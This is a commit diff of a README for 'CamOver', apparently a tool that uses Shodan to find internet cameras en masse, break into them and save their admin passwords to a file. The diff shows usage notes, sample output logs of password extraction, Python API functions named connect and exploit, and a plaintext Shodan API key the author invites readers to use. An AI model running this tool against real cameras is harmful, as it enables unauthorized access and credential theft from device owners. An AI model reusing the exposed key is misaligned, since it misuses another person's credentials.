Let's try to use Shodan search engine to exploit cameras over Internet and save all obtained passwords to `passwords.txt`, we will use it with `-t` for fast exploitation.
51
+
Let's try to use Shodan search engine to exploit cameras over Internet, we will use it with `-t` for fast exploitation.
**NOTE:** Given Shodan API key (`PSKINdQe1GyxGgecYz2191H2JoS9qvgD`) is my PRO API key, you can use this key or your own, be free to use all our resources for free :)
63
58
64
-
**output:**
65
-
66
-
```shell
67
-
[*] Authorizing Shodan by given API key...
68
-
[+] Authorization successfully completed!
69
-
[*] Initializing thread #0...
70
-
[*] (x.x.x.x) - connecting to camera...
71
-
[*] Initializing thread #1...
72
-
[*] (x.x.x.x) - connecting to camera...
73
-
[*] Initializing thread #2...
74
-
[*] (x.x.x.x) - connecting to camera...
75
-
[*] (x.x.x.x) - accessing camera config...
76
-
[*] (x.x.x.x) - extracting admin password...
77
-
[i] Thread #0 completed.
78
-
[*] (x.x.x.x) - connecting to camera...
79
-
[*] (x.x.x.x) - accessing camera config...
80
-
[*] (x.x.x.x) - extracting admin password...
81
-
[i] Thread #1 completed.
82
-
[*] (x.x.x.x) - connecting to camera...
83
-
[*] (x.x.x.x) - accessing camera config...
84
-
[*] (x.x.x.x) - extracting admin password...
85
-
[i] Thread #2 completed.
86
-
```
59
+
**Exploiting cameras from input file**
87
60
88
61
Let's try to use opened database of cameras with `-t` for fast exploitation.
89
62
skipped 3 lines
93
66
94
67
**NOTE:** It will exploit all cameras in `cameras.txt` list by their addresses and save all obtained passwords to `passwords.txt`.
95
68
96
-
**output:**
97
-
98
-
```shell
99
-
[*] Initializing thread #0...
100
-
[*] (x.x.x.x) - connecting to camera...
101
-
[*] Initializing thread #1...
102
-
[*] (x.x.x.x) - connecting to camera...
103
-
[*] Initializing thread #2...
104
-
[*] (x.x.x.x) - connecting to camera...
105
-
[*] (x.x.x.x) - accessing camera config...
106
-
[*] (x.x.x.x) - extracting admin password...
107
-
[i] Thread #0 completed.
108
-
[*] (x.x.x.x) - connecting to camera...
109
-
[*] (x.x.x.x) - accessing camera config...
110
-
[*] (x.x.x.x) - extracting admin password...
111
-
[i] Thread #1 completed.
112
-
[*] (x.x.x.x) - connecting to camera...
113
-
[*] (x.x.x.x) - accessing camera config...
114
-
[*] (x.x.x.x) - extracting admin password...
115
-
[i] Thread #2 completed.
116
-
```
117
-
118
69
## CamOver API
119
70
120
71
CamOver also has their own Python API that can be invoked by importing CamOver to your code:
skipped 6 lines
127
78
128
79
There are all CamOver basic functions that can be used to exploit specified camera.
129
80
130
-
* `connect(host)` - Connect specified camera by network address.
131
-
* `exploit(camera)` - Exploit connected camera.
81
+
* `exploit(address)` - Exploit single camera by given address.
Ivan Nikolsky
committed
with
GitHub
3 years ago
1 parent 9f2c6f4a